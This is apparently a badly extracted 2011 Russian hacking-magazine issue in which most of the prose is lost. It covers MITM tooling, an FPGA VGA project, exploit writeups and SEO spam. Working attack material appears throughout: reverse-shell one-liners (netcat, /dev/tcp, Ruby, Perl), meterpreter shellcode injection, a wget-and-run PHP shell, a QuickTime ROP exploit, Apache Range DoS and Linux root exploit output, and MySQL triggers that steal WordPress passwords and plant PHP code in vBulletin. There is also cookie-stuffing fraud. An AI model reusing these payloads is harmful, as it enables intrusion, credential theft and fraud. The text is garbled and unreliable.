ICMP REDIRECT MITM DNS OVER ICMP MITM

ICMP. ICMP Redirect, , ICMP-

. IP- IP-
, .
, , site.com 1.2.3.4,
0X4553-INTERCEPTER
-
: ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/
BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/
MYSQL/ORACLE.
:
ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC/MRAl.
SMTP/POP3 .

ARP- (ARP SCAN).
DHCP- (DHCP DISCOVERY).
(PROMISCUOUS SCAN).
MAC- LAN-.

(eXtreme mode),
. 0x4553-Intercepter
,
,
.
RAW-.
RPCAP, Linux/xBSD Windows-
( ).
NAT.
MITM-: ARP MITM, DNS over ICMP MiTM,
DHCP MiTM.
SSL- SSL MiTM + SSL Strip.
, , 1.2.3.4
, Intercepter NAT.
ICMP Redirect MITM. , , . Intercepter
,
ICMP Redirect. DNS
over ICMP Redirect.
site.com
DNS-. .
, DNS-
, 0x4553-NAT, DNS-. , site1.com, NAT ,
IP-, site1.com,
ICMP Redirect, ,
IP- .
site2.com, .
, - Intercepter
NAT.
, . , :
IP- - 192.168.1.10
IP- - 192.168.1.1
IP- DNS - 192.168.1.2
- 255.255.255.0
SSL MITM. 0x4553-NAT
038
DNS-
.
, ICMP. (, 8.8.8.8),
.
11 /154/ 2011
SSL
SSL MITM
, , ,
Intercepter. MITM- Intercepter,
, NAT.

. :
HTTPS 443;
POP3S 995;
SMTPS 465;
IMAPS 993.
0x4553-NAT .

. :
HTTPS NAT tcp-,
.

, .

.

,
.
, .
.
, . , , . NAT,
Intercepter .
, NAT :
SSL- ,
.
SSL STRIP
SSL Strip #125 (PDF-
). ,
SSL . HTTP-, https-. , ,
unix,
sslstrip. Intercepter SSL Strip SSL MITM,
. -
80- , . , , .
0x4553-NAT
SSL Strip favicon
.
,
. ,
gzip deflate.
- web-.
Accept-Encoding, . ,
,
gmail. Secure HttpOnly.
https- http.
https- https
. ,
Intercepter favicon, ,
. Intercepter
,
sslstrip, , , .
SSL Strip unix-.
sslstrip , web-.
dns dns-.
, , 0x4553-NAT,
. z
SSL MITM.
11 /154/ 2011
039
PHREAKING

!
VGA- FPGA
,
.
.

, , ,
VGA , ,
!
!

, , vga atmega, , Atmega
640 480 2020. , VGA-.
8040 ,
.
VGA arm7 100
,
, :(.
' , .
, !
?
CPLD FPGA. , ,
CPLD FPGA . FPGA ,
. -
040
11 /154/ 2011
, .
.
ebay.com FPGA
. ,
VGA! , :
1 , 8 , 8 , -, 2 PS/2
, 4 , ? ,
Altera Cyclone EP1C6 c 5980 ( ,
) 90
. 50, , PLL
( 2), 320. PLL , .

, , 8$
. .
?
( , ), (!) DVD-:

Altera
, ,
!

, (
, :)). , Altera
QuartusII Web Edition Software. 11.0, 9.1 - 2.
.
,
FPGA Altera ( ),
marsohod.org.
, ,
EPM240T1005, . ,
Verilog,
.
goo.gl/ZaCOa. . Verilog,
VHDL.
, , , !
!
VHDL Verilog , Verilog. , ,
. ,
, , .
. 1. VGA
11 /154/ 2011
. 2. Altera
2.
GREEN
3.
BLUE
4.
RES
5.
GND
6.
RGND
7.
GGND
8.
BGND
9.
KEY
10.
SGND
11.
ID0
12.
SDA
13.
HSYNC
14.
VSYNC
15.
SCL
VGA
VGA.
,
, VGA. 1987
,
.
15- .
1 .
1.
VGA :
( ). RED, GREEN
BLUE, 0 0.7 (
5 ). :
,
. .
, ,
.
5- (
, ).
041
PHREAKING
. 4.
640480
60 .
(
) ( ).
:
8 ;
96 HSYNC;
40 ;
8 ;
640 ;
8 .
800 .
:
2 ;
2 VSYNC;
25 ;
8
480 ;
8 .
525 .
,
. (
:)) (60) * (525) *
(800). 25.2 .
, , 25 .

: -
.
,
, .
-
.
.
. .
042
Verilog
. ,
,

, . ,
, .
, ( :)) :

50 25 .
-
, -

VGA-
(divide_clk)
, . 50 , 25 . st,
.
, .
- (async_receiver)
- . ,
, . ,
, fpga4fun.com (www.fpga4fun.
com/files/async.zip). ,

50 ,
25
11 /154/ 2011
. 3.
,
. ,
,
, !
:
( divide_clk) RX (
).
RxD_endofpacket (
) RxD_data 8 ,
. 25
- 115200:8:N:2. . - 50
5980.
50 ,
!
, -
(write_memory).

( en )
- ( data_in),
pos_of_write ( ),
address data_out
.
, 1 wr_en.
, . : 0 3071
, 3100 9499 .
!
(memory)
, , .
massiv[1000] .
. , ,
, RAM
Megafunction User Guide users.ece.gatech.edu/~hamblen/
UP3/ug_ram.pdf. , , 4 :
RAM (Single port RAM)
.
RAM (Single port RAM)
.
(Simple dual-port RAM)
.
RAM(Tri-state RAM) ,
.
11 /154/ 2011
,
, RAM (Single
port RAM) .
, ?
MegaWizard. .
ToolsMegaWizard Plug-in manager.
,
(Create a new custom megafunction variation). ,
. .
, , , .
Memory CompilerRAM:2PORT.
, ,
. , , .

/.
(With one read port and one write port), ,
(As a number of words).
Next ( )
How many 8-bit words of memory? 10000
(.. 80000 ). Finish, , .
:
clock ; 50
. ,
320 .
rdaddress wraddress .
data .
wren (write enable) 1,
wraddress data.
q , wraddress.
, -
. 5. Pin Planer
043
PHREAKING
ADDRESS_RADIX = UNS;
DATA_RADIX = BIN;
CONTENT BEGIN
00 : 00000000; -- 0
01 : 00000001; -- 1
...
END;
:
BIN ;
HEX ;
OCT ;
DEC , ;
UNS , .
. 6.
. 7.
. wraddress q
( 50 ;
PLL).
, , , , . , .
, !
2
: Intel Hex mif (memory initialization format).
(
; 812),
Intel Hex . ,
mif.
,
:
DEPTH = 3072;
WIDTH = 8;
044
,
1, 00000001 , Altera Web Edition ,
, .
. ,
, 8, .
. MegaWizard, ,
( Edit
an existing custom megafunction variables).
Next,
(. 3). , (Yes, use this file for the memory content data)
. ,
.
VGA- (vga_module)
! ,
, .
, 80 .
, ; 80-
;
.
?
. , . 80
.
480,
. 12
( ).
, .
, ,
( + 1) . .
12 , .
( , tick_counter,
).
(tick_counter == 1) ,
.
(tick_counter == 3; , )
.
(tick_counter == 5)
temp. tick_counter 8, tempa data_for_screen, .
(tick_counter == 6)
, . data, ,
data_for_screen, font.
11 /154/ 2011
,
. , ,
. , ,
!
...
,
. , . Project Navigator Files,

Create Symbol Files for Current Files
. FileNew
Block Diagram/Schematic Files.
Symbol tool (
) ,
. , ,
/. , . / ,
, . .
4.
/ ?
Pin Tool ,
: , . ,
.
.
! AssigmentsPin Planner .
/ , .
Location .

, ( ,
), . USB- JTAG- .
Altera (
marsohod.org, ).
Tools Programmer, ,
JTAG (Hardware Setup).
Start .
, RS-232 (
) ,
HyperTerminal c 115200:8n:2 , ,
, .
,
, , , .
, , 12
, ! -
( ),
. .
File Convert Programming Files.
:
1. Programming file type JTAG
Indirect Configuration File (.jic).
2. Configuration Device EPCS1
.
3. , .
4. Input Files to convert Flash Loader,
Add Device... Cyclone.
5. SOF Data Page_0, Add Files
.sof
.
6. ,
Properties. , :
Compression! .
7. Generate.
8. , Add File .jcc.
9. Program Verify - .
!
?
, , ,
, ! !
.
goo.gl/DVsja
MouseRefComp.
, ! ,
640480.
VGA
.
(!) :
if ( (line_count == y_mouse) && (letter_address/2 ==
x_mouse) ) font = 255; else font = data;
tick_counter = 0.
MouseRefComp
50 ( 100 ) ps2interface 2 DELAY100US,
DELAY20US, DELAY63CLK DEBOUNCE_DELAY.
! ,
, VGA. ,
, , - :)!
. 8.
11 /154/ 2011
, , ' ! ,
, , . , ,
1 . ,
SPI ,
, , sd/mmc .
.
, .
. ,
. , ,
DVD goo.gl/MYIeP. z
045
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK
-
DDoS ,
,
.
Apache. , DDoS
-, 60% .
range' Apache
. ,
nmap'
http-vuln-cve2011-3192.nse ( ).
, .
, DDoS Google (goo.gl/U9c3K). ,
IHteam
, - . ,
, ,
, . : Google
.
,
, DDoS'.

Google. ,
IP- .
, , , ,
SQL-, , . :
1. https://plus.google.com/_/sharebox/
linkpreview/?c=<SITE>&t=1&_reqid=<RANDOM_NUMBERS>&rt=j
2. https://images2-focus-opensocial.googleusercontent.
com/gadgets/proxy?url=<SITE>&container=focus
<SITE> , <RANDOM_NUMBERS>
.
goo.gl/f67F1. , IHteam
Google , , , .
--. -
046
11 /154/ 2011
EASY HACK
, HTTPS-, .

(HTTP HTTPS) domain.
, domain
,
. ,
. example.com (web.example.com) (example2.com).
.
( ). : web.
example.com example.com. ,
, , example.com,
web.example.com. . , ,
HTTPS c Secure, -
. : HTTP
. ,
( )? . , - MITM- ,
HTTP-
Set-Cookie . !
?
, . ,
session fixation (
),
. - , .

. ,
( -), - .
, . ,
, . . ,
-
. , ,
.
(netstat -nao).
. ,
, ,
- :).
, code dll-injection. , /
.
, , ,
. ,
. ,
,
. ,
. .
, , .
syringe (bit.ly/l8QE3D). ,
msfpayload. , , alpha_
mixed. -
, -
. Syringe
shellcodeexec ( ),
, . , .
. , Internet Explorer'
. , ,
meterpreter IE
. :
11 /154/ 2011
1. meterpreter reverse- :
./msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=thread LPORT=5555 LHOST=192.168.0.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw
BufferRegister=EAX
2. , :
./msfcli multi/handler PAYLOAD=windows/meterpreter/re
verse_tcp EXITFUNC=thread LPORT=5555 LHOST=192.168.0.1 E
3. , (IE):
syringe.exe -2 PYIIIIIIIIII1VSVXEPAA PID_IE
:
PYIIIIIIIIII1VSVXEPAA ;
PID_IE iexplore.exe (
tasklist);
-2 syringe.exe .
IE meterpreter,
, . , meterpreter,
,
. :).
, Syringe .
-3, syringe (
shellcodeexec). -1 , DLL',
. , msfpayload DLL' . ,
, , , DLL'
.
047
/ EASY HACK
WEB-,
LFI-
LFI (Local File Inclusion) ,

,
. ,
, .
, ,
. , LFI ( RFI).
.

- ,
LFI. -.
, .
. ?
SSH-.
OpenSSH,
, . : .
/var/log/auth.log , ,
. , :
<?php eval($_GET[cmd]); ?>
, .
. -,
( ), -, ,
. ,
, .
( ) NTFS
- NTFS (Alternative Data Stream,

ADS). : 15 .
, , ,
.
.
. -, , $DATA. , ,
,
, , , . -,
, .
, ,
( ). -,
, . -, ,
, ,
.
, , . , ADS . .
secrets.txt
echo "some secrets" > test.txt:secrets.txt
048
secrets.txt
more < test.txt:secrets.txt
notepad.exe test.txt:secrets.txt
11 /154/ 2011
EASY HACK

type C:\windows\system32\calc.exe > test.txt:calc.exe
dir /R
,
.
mklink.
, . , *nix (UFS) (hardlink) ,

, .
.
NTFS , -
. NTFS
. XP
:
mklink link_file.txt test.txt:secrets.txt
fsutil hardlink create _ _
( )
start c:\test.txt:calc.exe
wmic process call create \\.\c:\test.txt:calc.exe

/R:
Vista, mklink c '/h':

mklink /h _ _
- Windows. *nix. Windows .

.
, ,
- ,
. : ,
.
. 192.168.0.1.
:
-
nc l p 8080 e '/bin/bash'
-.
nc l p 5555
-.
nc 192.168.0.1 5555 e '/bin/bash'
e netcat ,
- FIFO:
- e
mknod bp p; nc 192.168.0.1 5555 0<bp | /bin/bash 1>bp
netcat , :
- netcat
/bin/bash -i > /dev/tcp/192.168.0.1/5555> 0<&1 2>&1
2- telnet
mknod bp p; telnet 192.168.0.1 5555 0<bp | /bin/bash 1>bp
, (perl, awk,
shell ..) - /.
- Ruby:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.1",
"5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print
io.read}end'
Perl:
perl -e 'use Socket;$i="192.168.0.1";$p=5555;socket(S,
PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,
sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(
STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

, wget, .
wget -O /tmp/shell.php http://192.168.0.1/good_php_shell.
txt && php -f /tmp/shell.php
, , -
Xterm. 6001 :

Xnest:1
xhost +ip_

xterm -display 192.168.0.1:1
, :).
EXE-
msfencode
exe- .
, . exe- ,
, (, ) ,
.
.
11 /154/ 2011
./msfpayload windows/meterpreter/reverse_tcp LPORT=5555 R

| ./msfencode -a x86 -t exe x cmd.exe k
:
-x (exe);
-k .
:)
049
(ivinside.blogspot.com)
(115612, . , .1)

, .

.

Measuresoft ScadaPro
CVSSV2
7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P)
BRIEF

SCADA-, ,
. , , , ,
SCADA. SCADA ,

, ,
. , , , , -
.
ScadaPro Measuresoft.

!
EXPLOIT
service.exe, 11234.
,
. ,
.
aluigi , . ,
050
.
.
, ,
- sscanf strcpy:
0040A0D9
0040A0DD
0040A0DE
0040A0E3
0040A0E4
.
.
.
.
.
LEA EDX,DWORD PTR SS:[ESP+38]

PUSH EDX
PUSH service.0067D484
; "%s"
PUSH EDI
CALL service.004192FB
; sscanf
>
.
.
.
>
.
.
.
.^
LEA EDX,DWORD PTR SS:[ESP+20]

MOV EAX,EDI
SUB EDX,EDI
LEA ESP,DWORD PTR SS:[ESP]
MOV CL,BYTE PTR DS:[EAX]
MOV BYTE PTR DS:[EDX+EAX],CL
ADD EAX,1
TEST CL,CL
JNZ SHORT service.0040A120
...
0040A114
0040A118
0040A11A
0040A11C
0040A120
0040A122
0040A125
0040A128
0040A12A
: aluigi.org/poc/scadapro_1.zip.
,
:
nc SERVER 11234 < scadapro_1b.dat
; c:\boot.ini
nc SERVER 11234 < scadapro_1c.dat
; c:\evil_file.txt
nc SERVER 11234 < scadapro_1d.dat
11 /154/ 2011
Accept-Encoding: gzip
Connection: close
Range.
,
. gzip-
(Accept-Encoding: gzip)
. , Range
, Apache ,
.
,
Request-Range, Netscape Navigator
2-3 MSIE 3.

, . :
$p, , , HEAD /
HTTP/1.1 HEAD /robots.txt HTTP/1.1
URL.

Apache, . :
, Apache
; c:\valid_file.txt
nc SERVER 11234 < scadapro_1e.dat
; notepad
$ curl -I -H "Range: bytes=0-1,0-2" -s www.example.com/

robots.txt | grep Partial
PoC Metasploit, /
/ .
TARGETS
Measuresoft ScadaPro <= 4.0.0
TARGETS
- Apache 1.3.x, 2.0.x 2.0.64 2.2.x
2.2.19.
SOLUTION
.
SOLUTION
nginx,
:

- Apache
CVSSV2
206 Partial Content,

.
- , ,
. .
7.8
proxy_set_header Range "";

proxy_set_header Request-Range "";
(AV:N/AC:L/AU:N/C:N/I:N/A:)
BRIEF
Full Disclosure
, -
Apache, 2.2.x.
,
, ,
,
.
EXPLOIT
goo.gl/DK1pA.
:
$ perl killapache.pl www.example.com 50
,
, .
:
HEAD / HTTP/1.1
Host: www.example.com
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,<...>,5-1299,5-1300
11 /154/ 2011
Apache
Range mod_header (RequestHeader unset Range
RequestHeader unset Request-Range)
Range mod_rewrite:
1
RewriteEngine On
RewriteCond
RewriteCond
RewriteCond
RewriteRule
%{HTTP:Range} bytes=0-[0-9]+, [NC,OR]

%{HTTP:Range} bytes=([0-9-],){4,} [NC,OR]
%{HTTP:Range} bytes=[0-9,-]+,0-(,|$) [NC]
.? http://%{SERVER_NAME}/ [NS,L,F]
2
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|GET) [NC]
RewriteCond %{HTTP:Range} ([0-9]*-[0-9]*)(\s*,\s*[0-9]*[0-9]*)+
RewriteRule .* [F]
3
RewriteEngine On
051
ScadaPro
RewriteCond %{HTTP:Range} bytes=0-.* [NC]

RewriteRule .? http://%{SERVER_NAME}/ [R=302,L]
, , Apache 2.2.20.
Apple QuickTime PICT

PnSize Buffer Overflow
CVSSV2
9.3
,
. ,
.
PICT- 512 ,
.
QuickDraw/Color QuickDraw. QuickDraw-
,
, .
(AV:N/AC:M/AU:N/C:C/I:C/A:C)
BRIEF
: 8 2011
: MC, corelanc0d3r
CVE: CVE-2011-0257
QuickTime Apple, 1991 ,
, , ,
. QuickTime Player ,
,
, , , (VR).
EXPLOIT
PnSize
PICT-. 16-
32- .
052
picSize:
picFrame:
INTEGER;
RECT;
, . , .
1- ,
. 1-
2- (0x0011). 2-
(0x02ff).
( 30 ):
$0011
WORD
$02FF
WORD
$0C00
WORD
24
{ }
{ }
{ }
{}
11 /154/ 2011
ROP-
( ):
opcode WORD
data . . .
opcode WORD
data . . .
...
$00FF
WORD
{ }
{ }
0x13BDF8,
.
ROP-, DEP
.
ROP-:
67202C75
ADD ESP,4D0
67202C7B
67E21084
67E21085
RETN
POP ECX
RETN
68994002
68994004
MOV EAX,DWORD PTR DS:[ECX]

RETN
6696CA36
6696CA37
XCHG EAX,ESI
RETN
66C78001
66C78002
POP EBP
RETN
,
6691CCD8
.
JB SHORT QuickT_1.6691CD04
6691CCDA
.
REP MOVS DWORD PTR ES:[EDI],
DWORD PTR DS>
6691CCDC
.
JMP DWORD PTR DS:[EDX*4+6691CDF4]
67208003
67208004
POP EBX
RETN
6783EE02
6783EE03
POP EDX
RETN
n edi , access violation. SEH- -
67E21084
67E21085
POP ECX
RETN
{ }
:
...
$0006
$0007
$0008
...
SpExtra
PnSize
PnMode
space extra (fixed point)

pen size (point)
pen mode (word)
4
4
2

PnSize, ,
.
11 /154/ 2011
053
6762A008
6762A009
POP EDI
RETN
685A9802
685A9803
682F0001
682F0002
66A78005
POP EAX
RETN
PUSHAD
RETN
RETN
,
( ):
67EB8573
0013B53C
0013B540
0013B544
0013B548
...
CALL ESP
90909090
EB5903EB
FFF8E805
4949FFFF
II
msf exploit(apple_quicktime_pnsize) > set CMD calc.exe

CMD => calc.exe
msf exploit(apple_quicktime_pnsize) > show options
Module options (exploit/windows/fileformat/apple_quicktime_pnsize):
Name
Current Setting Required Description
------------------ -------- ----------FILENAME msf.mov
no
The file name.
Payload options (windows/exec):
Name
Current Setting
Required Description
------------------------- ----------CMD calc.exe yes The command string to execute
EXITFUNC process yes Exit technique: seh, thread,
process, none
Exploit target:
Id Name
-- ---0
Windows XP SP3 with DEP bypass

metasploit:
msf exploit(apple_quicktime_pnsize) > exploit

[*] Generated output file /home/lalala/.msf4/data/exploits/msf.mov
msf > use exploit/windows/fileformat/apple_quicktime_pnsize

msf exploit(apple_quicktime_pnsize) > set payload windows/exec
payload => windows/exec
TARGETS
Apple QuickTime Player 7.60.92.0
SOLUTION
,
SEH-
054
11 /154/ 2011
Linux Kernel < 2.6.36.2 Econet Privilege

Escalation Exploit
CVSSV2
6.2
(AV:L/AC:H/AU:N/C:C/I:C/A:C)
BRIEF
: 5 2011
: Jon Oberheide, CVE: CVE-2010-4073
EXPLOIT
,

. ,
, CVE. CVE-:
CVE-2010-3848
econet_sendmsg, net/econet/af_econet.c Linux < 2.6.36.2.
econet ,
, iovec-.
CVE-2010-3850
ec_dev_ioctl net/econet/af_econet.c Linux < 2.6.36.2
CAP_NET_ADMIN,
econet ioctl- SIOCSIFADDR.
CVE-2010-4073
ipc Linux < 2.6.37-rc1 , -
:
$ gcc 17787.c -o expl -lrt
$ ./expl
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xffffffff81088ad0
[+] resolved symbol prepare_kernel_cred to
0xffffffff81088eb0
[+] resolved symbol ia32_sysret to 0xffffffff81046692
[+] spawning children to achieve adjacent kstacks...
[+] found parent kstack at 0xffff88001c6ca000
[+] found adjacent children kstacks at 0xffff88000d10a000
and 0xffff88000d10c000
[+] lower child spawning a helper...
[+] lower child calling compat_sys_wait4 on helper...
[+] helper going to sleep...
[+] upper child triggering stack overflow...
[+] helper woke up
[+] lower child returned from compat_sys_wait4
[+] parent's restart_block has been clobbered
[+] escalating privileges...
[+] launching root shell!
# id
uid=0(root) gid=0(root)
TARGETS
Linux Kernel < 2.6.36.2
SOLUTION
, . z
Pr0xor (php.m4sql@gmail.com, rdot.org/forum)

MYSQL

,

WWW
MySQL 5
:
,
.

,
.

.
056
bit.ly/puA2KI

UDF-
MySQL 4.
bit.ly/rhl5yM

UDF-
.
bit.ly/rnO25g

AppArmor.
bit.ly/4cvqnW

.
bit.ly/cT6S7

. MySQL Proxy
bit.ly/p2PfjD
RDot,
.
DVD

? SQL, .
,
,
.
.
. SQL-.

. , ,
. :
() ,
.
.
, , INSERT,
UPDATE DELETE. ,
,
, .

-
,
, .
11 /154/ 2011
EMS SQL Manager
,
,
,

.
,
. MySQL .
, .
, WordPress. ,
,
.
,
, ,
, , .
, WP , ,
.
, , ,
, , , , .
, .
, , , ,

:
CREATE TABLE 'wplog' (
'id' INT NOT NULL AUTO_INCREMENT ,
'user' VARCHAR(20) NOT NULL ,
11 /154/ 2011
'user_pass' VARCHAR(64) NOT NULL ,

'timestamp' TIMESTAMP NOT NULL ,
PRIMARY KEY ( 'id' )
);
wplog test,
wordpress.
:
CREATE TRIGGER 'wp_log' BEFORE UPDATE
ON 'wordpress'.'wp_users'
FOR EACH ROW BEGIN
IF NEW.user_pass!='$P$B9v9rCvKUXneMDBnlvCaO74EtBG77hM' THEN
SET @pass = NEW.user_pass;
INSERT INTO 'test'.'wplog'
SET 'user'= USER(),'user_pass'=@pass;
END IF;
END;
, wp_users
, - ,
, wplog
. .
, , ,
, ,
- php-. ,

MySQL, ,
, ,
.
,
. ,
057

WORDPRESS
VBULLETIN 3
vBulletin 3
.
, Powered
by vBulletin Google 2 ,
(bit.ly/ovMKX1)
. , ,

.
bit.ly/dBrtaA.
SQL-
, exploit-db.com.
, ,

wp_usermeta. ,

, ,
,
. ,
,
PHP-.
,
, MySQL Proxy.
master-slave ,
slave & master . MySQL Proxy
, .
lua,
- MySQL . : bit.ly/rcxQxI.

.
WordPress 2.5.1. ,
wp_options
:
active_plugins
a:1:{i:0;s:19:"akismet/akismet.php";}
,
, ,
. , , . ,
./wp-settings.php. WP 2.5.1
:
if ( get_option('active_plugins') )
{
$current_plugins = get_option('active_plugins');
if ( is_array($current_plugins) )
{
foreach ($current_plugins as $plugin)
{
if ('' != $plugin && file_exists(
ABSPATH.PLUGINDIR .'/'.$plugin))
include_once(ABSPATH.PLUGINDIR.'/'.$plugin);
}
}
}
, ,
.
. (2.8 )
,
.
WordPress
058
11 /154/ 2011
2.5.1 , ,

wpaddplugin:
CREATE TRIGGER 'up_pluggin' BEFORE INSERT
ON 'wordpress'.'wp_comments'
FOR EACH ROW BEGIN
IF NEW.comment_content = 'wpaddplugin' THEN
UPDATE 'wordpress'.'wp_options'
SET 'option_value' = 'a:1:{i:0;s:17:"../../../e/hi.php";}'
WHERE 'wp_options'.'option_id' =36;
END IF;
END;
../../../e/hi.php
-, php,
, EXIF- php-.
.
rdot.org.
VBULLETIN
, MySQL Proxy
. ?
:
MySQL?
FILE,
777
SELECT ... INTO OUTFILE ....
FILE .
, ,
,

( CMS ,
).
11 /154/ 2011

,
,
.
vBulltin 3.
,
/ ,
. :
,

aj4x user:
CREATE TRIGGER 'vb_users' BEFORE UPDATE
ON 'vb'.'post'
FOR EACH ROW BEGIN
IF NEW.pagetext = 'getadmindata' THEN
SET @my_user = NEW.title;
SET @data = (SELECT concat(username,':',password,':',salt)
FROM user WHERE username=@my_user);
UPDATE 'vb'.'pmtext' SET 'message' = @data
WHERE 'pmtext'.'title' ='aj4x';
END IF;
END;
059

,
:
1.
,

;
2.
(

).

MySQL 5.0.2.

,

INSERT, UPDATE DELETE.
,
CREATE
PROCEDURE, CREATE FUNCTION CREATE
TRIGGER .

CALL.
, ,
(
SQL
), ,
(INSERT,
UPDATE, DELETE),
.
:
INSERT

: INSERT, LOAD DATA

REPLACE.
UPDATE ,
,
UPDATE.
DELETE
,
DELETE REPLACE.
, AFTER,
, .
3. trigger_event :
INSERT, UPDATE, DELETE.
4. tbl_name ,
.
5. trigger_body SQL-,
.
, DROP
TABLE TRUNCATE
,
DELETE.
,
,
-.
MySQL 5.1.6 SUPER,
5.1.6 TRIGGER.
:

(

).

:
1. ,

.
USE < >
<
>.< >.
2.

,
';'.
,

delimiter.
phpMyAdmin,

, delimiter
.
CREATE
[DEFINER = { | CURRENT_USER }]
TRIGGER trigg_name trigg_time trigg_event
ON tbl_name FOR EACH ROW trigger_body
,
, :
1. trigger_name ,
.
2. trigger_time , . : BEFORE
AFTER, , .
, ,
trigger_time BEFORE, -
,

.
, MySQL 5.

.

,
.
.
, aj4x,
print_r(ini_get_all()),
SQL :
INSERT INTO 'datastore'
VALUES
('pluginlist',
'a:1:{s:13:"ajax_complete";s:25:"print_r(ini_get_all());\r\n\";}',
1);

-
. , -
vBulletin 3
PHP- .
,
, , :). post
auth Admin Panel Code Execution. ,
PHP- ,
. ,
, ,
: ,
,
.
060
INSERT INTO 'plugin'

('pluginid', 'title', 'hookname',
'phpcode', 'product', 'devkey',
'active', 'executionorder')
VALUES
(1, 'aj4x', 'ajax_complete',
'print_r(ini_get_all());', 'vbulletin', '',
1, 5);
, vb_foruma.net/ajax.php,
!
,
.
php-
11 /154/ 2011
UDF
, CREATE FUNCTION
MySQL (
) UDF
( ). UDF-
MySQL
.
, SQL-,
UDF-
.
, UDF-,
.
MySQL 4 .

LIB_MYSQLUDF_SYS,
, UDF (mysqludf.org). ,
,
. UDF, .
:
1. (
) lib_mysqludf_sys_0.0.3.tar.gz, /usr/lib/mysql/
plugins.
2. :
lib_mysqludf_sys mysqludf.org
FOR EACH ROW BEGIN

IF NEW.pagetext = 'mynewtestdata' THEN
SET @exists_plugin = (SELECT data FROM 'vb'.'datastore'
WHERE 'datastore'.'title'='pluginlist');
UPDATE 'vb'.'pmtext'
SET 'message' = @exists_plugin
WHERE 'pmtext'.'title' ='aj4x';
DELETE FROM 'vb'.'datastore' WHERE title='pluginlist';
INSERT INTO 'vb'.'datastore' VALUES ('pluginlist',
'a:1:{s:13:"ajax_complete";s:23:"print_r(ini_get_all());";}',
1);
DELETE FROM 'vb'.'plugin';
CREATE FUNCTION sys_eval

RETURNS string SONAME 'lib_mysqludf_sys.so';
3. sys_eval,
:
select sys_eval ('id')
uid=60(mysql) gid=107(mysql) groups=107(mysql),0(root)
, ,
: , lib_
mysqludf_sys.so, ,

, . , ,
(, /usr/lib/mysql/plugins
777),
FILE, lib_mysqludf_
sys.so SELECT ....
INTO OUTFILE. ,
,

. sys_eval
AppArmor, ,
,
, .
,
.
, ,

:
CREATE TRIGGER 'vb_pluggin' BEFORE INSERT
ON 'vb'.'post'
11 /154/ 2011
INSERT INTO 'vb'.'plugin'('pluginid',

'title', 'hookname', 'phpcode',
'product', 'devkey', 'active',
'executionorder')
VALUES
(1, 'aj4x', 'ajax_complete',
'print_r(ini_get_all());',
'vbulletin', '', 1, 5);
END IF;
END;
,
mynewtestdata
ajax.php, , , ,
!

,

. MySQL-.
PHP- .
- Zend IonCube,
, ,
,
. , -
, , , .
, , localhost,

(, phpMyAdmin), ,
,
. ,
. z
061
RushteR (rushter.com)
WordPress
,
,

,
.
. ,
,
.
?
062
WWW
:
domenforum.net
SEO :
searchengines.ru
xt
:
xtool.ru

:
investmn.ru

:
alexa.com
:
bit.ly/o0nUi4
AddUrl :
:
webmaster.yandex.ru
Google:
www.google.com/addurl
GoGo:
gogo.ru/wmaster/add_site.html
WebAlta:
www.advans.ru/webalta
Yahoo:
bit.ly/H1NX
MSN/Bing:
bit.ly/nsAcZH
Rambler:
bit.ly/nWv3IR
Aport:
bit.ly/zwKMt
11 /154/ 2011
WordPress
AB OVO
. -, . ,
,
, . , RSS-
.
7 :
1. ;
2.
;
3. (, ,
..);
4.
;
5. ;
6. ;
7. 1.
. :
-. : .
, ,
.
. . ,
, ,
. ?,
. : , ,

,
. !

justdropped.com. ,
, . ,
,
. .

. , ,
.
,
( ).
RSS-.
, , , .
,
10-15
1-2
. , .

,
.
- . ,
. ,
, .
. ,
-.
. , ,
tbp3 BRush
.
:
.
blogger.com, livejournal.com wordpress.com. .
:
. :
1.
;
2. ,
;
3. .

. vds , shared-
-
, .
. .
, (
) . , ,
.
WORDPRESS
Xml sitemap
bit.ly/9Kcg9Z

XML-
, ,
.
, .
11 /154/ 2011
Platinum Seo Pack

bit.ly/QGOMs
SE-

. :
,
, -, .
WP Super Cache
bit.ly/2JRmag
, .

10, WP Super
Cache

.

.
Popular Posts
bit.ly/fTOJ
,
.

, .
(
).
Simple Tags
bit.ly/1TAGjC

.

. ,
.

.
063

RSS-
.
.
RSS- (subscribe.ru/catalog/?rss,
rssportal.ru).
,
RSS,
. .
: 3-5
, , -
, ,
.
, :
1. ;
2. 300;
4. 5 ;
5. ;
6. .
?

WordPress ( Drupal DLE). ,
.
, , FeedWordPress. RSS-.
:
RSS/Atom;
;
;
/ ;
;
;
cron.
, :
1. Syndication, Posts & Links. New posts Hold syndicated posts for review; mark as Pending,
Permalinks point to: The
local copy on this website.
.
2. RSS, add multiple, Syndication. RSS-,
Amazon.com
064

1. .
Google
Adsense. ,
, . ,
, MFA (Made for Adsense).
2. .
:
.
3. .
sape.ru
linkfeed.ru. ,
, SEO-.
,
. - .
4. .
. ,
.
,
. , ,
:-).
5. .

. ,
.
6. ookie stuffing.
cookie stuffing (bit.ly/pObKhh).
.

. , , ,
, . -
. ,
Amazon.com, 15%.
,
Add.
. Subscribe to selected
resources.
3. Syndicated
resources Update checked. ,
, .
4. - ,

1-2 .
5. , 2 , . ,
.
FeedWordPress , .
WordPress , ,
, . . CMS . RSS
11 /154/ 2011
>> coding
FeedWordPress

?
, .
1. .
,
.
2. .
, , ,
.
3. .
, .
4. :
;
;
;
;
HTML;
/.
5. .
6. .

, ,
.

, (Google
).
CMS (
)
RP- ( ). WordPress
RPC : XML-RPC
. (
) ,
HTML- .

. . ,
2-3 , .
50-60%
(
Xrumer). , , liveinternet.
.
,
.
. -5,
.
?
.
.
.
,
.

.
, ,
, xtemplate.ru blogstyle.ru.
, ,
( ,
).
,
. ,
AddUrl .
.
066
(. ).
. ,
.
.

.

.
. ,
,
,
. , . ,
: ,
, , .
